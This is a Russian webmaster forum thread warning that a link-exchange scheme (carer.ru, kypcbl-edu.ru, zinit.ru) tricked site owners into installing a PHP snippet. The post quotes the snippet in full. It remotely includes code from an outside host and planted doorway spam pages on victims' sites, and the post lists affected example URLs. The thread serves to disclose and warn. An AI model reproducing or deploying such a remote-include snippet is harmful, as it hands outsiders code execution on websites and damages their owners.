Будте осторожны с чужими ссылками! (история обмена с сайтами carer.ru, kypcbl-edu.ru)

ЕИ
На сайте с 22.02.2005
Offline
10
7861

Уважаемые коллеги!

Я полон негодования, поэтому решил написать в форум, проинформировать так сказать общество.

Недавно обменялся ссылками с группой сайтов:

carer.ru

kypcbl-edu.ru

zinit.ru

и другие.

Они предлагают форму по обмену здесь:

http://carer.ru/links/index.htm

причем якобы для облегчения обмена они предложили мне вставить php-код:

***************

<!-- Обмен ссылками -->

< ? $l="http://links.carer.ru";

$s=$_SERVER["HTTP_HOST"].$REQUEST_URI;

if(empty($all)) include("$l/link2.php?u=".$s);

if(!empty($file)) {include("$l/c/?file=$file&u=$s"); exit();}

if((!empty($all))and(empty($file))) include("$l/link22.php?u=$s"); ?>

<!-- Конец кода -->

*********************

Каюсь, не посоветовался с программерами :-(, вставил код в ссылочный каталог.

Так вот, вдруг я замечаю что на мой сайт заходят по каким-то чужим (в смысле не по теме моего сайта) запросам.

Смотрю в Яндексе, и что же вижу - на МОЕМ САЙТЕ ЧУЖИЕ СТРАНИЦЫ!!!

Оказавается этот скрипт подгружает и создает на моем сайте десятки дорвеев! А "мастера" с этих сайтов ручками добавляют их в поисковики!!!

Вот блин.....

Кто знает что эти "мастера" могли еще загрузить (или скачать?) на мой сайт?!

В общем разозлился я и решил поискать еще пострадавших (ну чтоб себя успокоить - не я один такой... несообразительный ;-), и оказалось что таких как я десятки!

Надо бы им написать, да для начала решил предупредить всех остальных, так как эти ребята довольно активно предлагают обмен ссылками (новый "центр американского английского", что ли?).

Я конечно сразу это дело все удалил, поэтому приведу примеры чужих сайтов (да не обидяться на меня их владельцы).

Вот примеры, которые видны в выдаче Яндекса:

http://www.socioego.ru/institute/partners.php - это оригинал страницы сайта со ссылочным каталогом

http://www.socioego.ru/institute/partners.php?all=1&file=kypcbl-edu.2&c=480 - а это во что она превращается, превращается...

http://www.socioego.ru/institute/partners.php?all=1&file=kypcbl-edu.2&c=100 - превращается.........

еще примеры

http://www.erker.ru/catalogue.education.php?all=1&file=carer.2&c=400

http://www.erker.ru/catalogue.education.php?all=1&file=carer.2&c=80 и так далее

http://www.sayanweb.ru/links.php?all=1&file=zinit.2&c=340

http://www.sayanweb.ru/links.php?all=1&file=zinit.2&c=200

http://www.sayanweb.ru/links.php?all=1&file=zinit.2&c=60 и так далее

и еще многие, многие другие!

А вот и кульминация - ДОРВЕИ:

http://www.parakhakasia.ru/links/other/linki.php?all=1&file=kurcy.2&k=26 - а это вообще шедевр! меняем k=27, 28, 50 и т.д. - сотни дорвеев!!!

http://mouse.spaceweb.ru/~parakhru/links/other/linki.php?all=1&file=kurcy.2&k=28 - то же самое

http://www.autoclick.spb.ru/linki.php?all=1&file=kurcy.2&k=25

Вот такие дела.

Не обожгитесь!

vitcom
На сайте с 08.07.2004
Offline
56
#1

Деньги наверное зарабатывают :)

Отлично продуманная идея. Я таких скриптов вообще бы не рекомендовал ставить - очень много интересной информации о сайте можно узнать.

1. reffer hits

2. посещаймость (кол-во)

3. иногда и пароли. которые вы вводили. и т.п.

посмотрите например phpinfo();

не говоря уже о той информации которыю Вы написали.

[Удален]
#2

Да какая там информация! Вы на своем сайте выполняете скрипты по команде с другого сервера. То ради чего хакеры стараются, бессонными ночами копаясь во всевозможных сорцах (а кто помоложе - в журнале ксакеп) - вы им добровольно разрешили делать. :)

[Удален]
#3
Не обожгитесь!

Хороший совет :) Но на месте админа я бы кое-кому кое-что бы оторвал, чтобы в следующий раз этот кое-кто хоть немного думал, что делает.

Каширин
На сайте с 03.01.2004
Offline
1030
#4

Миша, зря ругаешься.

Большинство вебмастеров сами и программируют, и верстают, и продвигают, поэтому говорить о стройной системе безопасности не стоит.

Кроме того, этот пост говорит не об опасности хака, а о том, как перечисленные сайты ведут обмен ссылками!

Да, конечно, можно обвинять того, у кого вытащили кошелек - мол, нечего глазами хлопать по сторонам. Но ведь он виноват не один, верно? Тот, кто вытащил, - тоже немножко виноват? 🚬

[Удален]
#5

Кто б спорил. Но главный вывод - это не то, что вебмастерам таких-то и таких-то сайтов надо оторвать голову или что покруче.

А что не надо клювом щелкать.

В данном случае не нужно быть крутым программистом, чтобы понять, что есть опасность.

[Удален]
#6

Собственно, Interitus высказался быстрее.

Advisor
На сайте с 24.11.2003
Offline
177
#7

Егоров Игорь, стучите в Яндекс. Таких жуков нужно давить....

funnybunny
На сайте с 14.09.2002
Offline
357
#8

Людям с Новотэка отписал, наверное отреагируют

ЕИ
На сайте с 22.02.2005
Offline
10
#9

Вот ведь какая штука...

Сегодня разослал письмо об этом спаме тем пострадавшим, которых с ходу нашел в Яндексе, и что мне ответили люди:

"...сайт начал уже стремительно падать в

поиске...", "...Мой сайт уже неделю как не найти в поисковиках..."

Значит эти доры понижают релевантность сайта! (кстати я тоже это заметил)

Вот так вампиры!

Ну а народ конечно как и я не очень разбирается в программировании :(

Но это не значит что надо прощать такие дела!

Может кто с их хостингом связан - masterhost.ru - посодействуйте, чтоб их сайты закрыли (полный список здесь - ttp://links.carer.ru/allsites.htm?host=carer.ru ).

Вообще конечно и в Яндекс можно написать, но тут сложно доказать что это они сделали 😡

I
На сайте с 25.01.2005
Offline
37
#10
Как писал Егоров Игорь
Сегодня разослал письмо об этом спаме тем пострадавшим, которых с ходу нашел в Яндексе

Спасибо за письмо!

Я, вроде, не страдал 🚬

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий